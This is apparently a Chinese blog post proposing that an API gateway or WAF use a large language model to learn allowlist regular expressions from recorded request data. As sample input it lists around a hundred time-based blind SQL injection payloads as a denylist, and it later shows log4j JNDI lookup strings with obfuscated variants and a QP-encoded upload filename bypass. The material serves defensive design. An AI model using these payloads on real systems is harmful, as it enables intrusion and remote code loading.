大语言模型和API网关
一、大模型能力和WAF配置员
今天试验了百度大模型文心一言,大模型可以通过学习键值对内容,输出较为安全的正则表达式:
下面给出一段更为严谨的文字
allowlist = [
"5f50bbb0-31ec-3117-6681-3478eb7b1918",
"67c3a29f-ff70-20f3-45ef-b80a82edc6ff",
"9b076de0-1a53-38bc-9dc4-bf4675f0d64c",
"c8926b24-7485-f5a6-a97a-5708fd3a4fdc",
"129bf3b3-962e-70c5-1e88-41aef88db2e5",
"ee99dd41-6c77-b14c-c4d7-e2b2be1bf59a",
"796c22f7-a3b4-b3c2-6950-6b6713101f65",
"56f798ad-3f4f-9d05-1b79-ceab4bdf3c25",
"f32619b6-45f3-8186-d5a0-be412c36fee9",
"707d52e2-196c-92d4-cea6-f0c15127dfbe",
"c2ed49d7-8bf7-a0b4-8171-0e0a1aef1005",
"62d36776-bc05-9a84-9659-0ab7bc597d20",
"f9020e2b-4ac0-c4e3-7551-abd64e20da20",
"d5e38166-1d51-3300-a3d8-1c0a72a3cce0",
"1e967c88-7de0-2d41-e5dd-dcab30599b18",
"93b1e18b-73c1-53d3-062c-f67c45e9d5a7",
"f9daa359-2998-bbec-57ae-c45ba49b8f19",
"df7f7d51-eb0a-0c35-7899-3f3c80a872e3",
"6c0e76aa-8887-98d1-c84e-52f9a003813e",
"1e15b7f5-4735-2b42-3278-5838ec5cac39",
"d67d044e-bc8b-2364-28a2-665a1c41e065",
"bbd93d22-7d0d-4943-dac0-73a438bc5edb",
"5e0c1d43-4690-4ae8-e3f3-18fb2cdfbc72",
"4b9a00fb-3341-9125-7db5-d97fa9908ee3",
"0f86ea73-1e52-81af-9fc2-e52237c5f0f4",
"6bdb678a-28e6-b1ec-b21f-546db4dbb117",
"74ed2ff8-f536-cfaf-6543-787e116fdcee",
"1affecd5-8f8c-824c-d7bc-e1f35f32b9d4",
"2b19a060-a692-5cfe-edde-331fee711031",
"834fb517-fc48-1312-9b2c-3c792d0feec0"
]
denylist = [
"sleep(5)#",
"1 or sleep(5)#",
"\" or sleep(5)#",
"' or sleep(5)#",
"\" or sleep(5)=\"",
"' or sleep(5)='",
"1) or sleep(5)#",
"\") or sleep(5)=\"",
"') or sleep(5)='",
"1)) or sleep(5)#",
"\")) or sleep(5)=\"",
"')) or sleep(5)='",
";waitfor delay '0:0:5'--",
");waitfor delay '0:0:5'--",
"';waitfor delay '0:0:5'--",
"\";waitfor delay '0:0:5'--",
"');waitfor delay '0:0:5'--",
"\");waitfor delay '0:0:5'--",
"));waitfor delay '0:0:5'--",
"'));waitfor delay '0:0:5'--",
"\"));waitfor delay '0:0:5'--",
"benchmark(10000000,MD5(1))#",
"1 or benchmark(10000000,MD5(1))#",
"\" or benchmark(10000000,MD5(1))#",
"' or benchmark(10000000,MD5(1))#",
"1) or benchmark(10000000,MD5(1))#",
"\") or benchmark(10000000,MD5(1))#",
"') or benchmark(10000000,MD5(1))#",
"1)) or benchmark(10000000,MD5(1))#",
"\")) or benchmark(10000000,MD5(1))#",
"')) or benchmark(10000000,MD5(1))#",
"pg_sleep(5)--",
"1 or pg_sleep(5)--",
"\" or pg_sleep(5)--",
"' or pg_sleep(5)--",
"1) or pg_sleep(5)--",
"\") or pg_sleep(5)--",
"') or pg_sleep(5)--",
"1)) or pg_sleep(5)--",
"\")) or pg_sleep(5)--",
"')) or pg_sleep(5)--",
"AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe",
"AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='",
"AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)",
"AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--",
"AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#",
"SLEEP(5)#",
"SLEEP(5)--",
"SLEEP(5)=\"",
"SLEEP(5)='",
"or SLEEP(5)",
"or SLEEP(5)#",
"or SLEEP(5)--",
"or SLEEP(5)=\"",
"or SLEEP(5)='",
"waitfor delay '00:00:05'",
"waitfor delay '00:00:05'--",
"waitfor delay '00:00:05'#",
"benchmark(50000000,MD5(1))",
"benchmark(50000000,MD5(1))--",
"benchmark(50000000,MD5(1))#",
"or benchmark(50000000,MD5(1))",
"or benchmark(50000000,MD5(1))--",
"or benchmark(50000000,MD5(1))#",
"pg_SLEEP(5)",
"pg_SLEEP(5)--",
"pg_SLEEP(5)#",
"or pg_SLEEP(5)",
"or pg_SLEEP(5)--",
"or pg_SLEEP(5)#",
"'\\"",
"AnD SLEEP(5)",
"AnD SLEEP(5)--",
"AnD SLEEP(5)#",
"&&SLEEP(5)",
"&&SLEEP(5)--",
"&&SLEEP(5)#",
"' AnD SLEEP(5) ANd '1",
"'&&SLEEP(5)&&'1",
"ORDER BY SLEEP(5)",
"ORDER BY SLEEP(5)--",
"ORDER BY SLEEP(5)#",
"(SELECT * FROM (SELECT(SLEEP(5)))ecMj)",
"(SELECT * FROM (SELECT(SLEEP(5)))ecMj)#",
"(SELECT * FROM (SELECT(SLEEP(5)))ecMj)--",
"+benchmark(3200,SHA1(1))+'",
"+ SLEEP(10) + '",
"RANDOMBLOB(500000000/2)",
"AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))",
"OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))",
"RANDOMBLOB(1000000000/2)",
"AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))",
"OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))",
"SLEEP(1)/*' or SLEEP(1) or '\" or SLEEP(1) or \"*/"
]
要求:
1)请提供一个正则表达式。
2)正则表达式应匹配allowlist的内容。
3)编写的正则表达式不应匹配denylist的内容。
4)最终结果不需要介绍、解释和代码,应该只包括正则表达式。
5)正则表达式应尽可能简短,不要过于复杂。
通过正向业务数据和反向攻击代码可以获得一个安全的正则表达式
1)以往的WAF配置员就是针对无校验的键值对,提供正则表达式以白名单的方式进行安全防护,防止外部的恶意输入。
可以参考华为产品:https://support.huawei.com/hedex/hdx.do?docid=EDOC1100103264&id=ZH-CN_TOPIC_0183842598
通过1-2周的生产数据进行学习,一般能形成一套针对业务的请求白名单
2)学习业务数据形成白名单的好处:
2.1)例如log4j的变形攻击代码:攻击载荷与正常业务入参差异较大,无法匹配业务入参的正则表达式,因此哪怕WAF黑名单策略尚未更新,攻击者也无法得逞
#log4j基本的攻击代码
${jndi:ldap://XXX.net/exploit}
${jndi:rmi://XXX.net/exploit}
#第1种变形
${jnd${upper:ı}:ldap://XXX.com/exploit}
#第2种变形
${j${:-n}di:ldap://XXX.net/exploit}
2.2)利用QP码绕过WAF进行恶意上传,原始例子: https://mp.weixin.qq.com/s/gY8kSFSZ4D9NELO0uc188g
这种情况更加简单:一般上传的文件名都是 XXX.doc、XXX.docx、XXXX.pdf 等,如果有一天突然冒出一个 =?UTF-8?Q?=E6=B5=8B=E8=AF=95=2Ejsp?= ,肯定无法匹配白名单正则表达式,会被直接拦截
二、落地方案
1)首先网关支持对历史调用进行存储以便提供给大模型进行学习生成正则表达式
2)网关对入参键值对进行白名单过滤,以阻止意料之外的HTTP格式
3)可配置可信入参,其中正则表达式可以利用(1)当中记录的请求键值数据让大模型进行学习,由大模型输出安全的表达式并人工二次验证
4)网关还能对复杂业务场景做入参和出参的集成规则,以处理部分逻辑漏洞
总结:当Web应用安全和工控安全一样,使用白名单自学习的方法进行防护时:
1)软件测试理论中的等价类、边界值成为基础理论
2)渗透测试的各种攻击场景变成了安全需求
3)机器学习的理论变成了工程实践
当各个维度的知识串联在一起,反而深深地感受到知识的匮乏。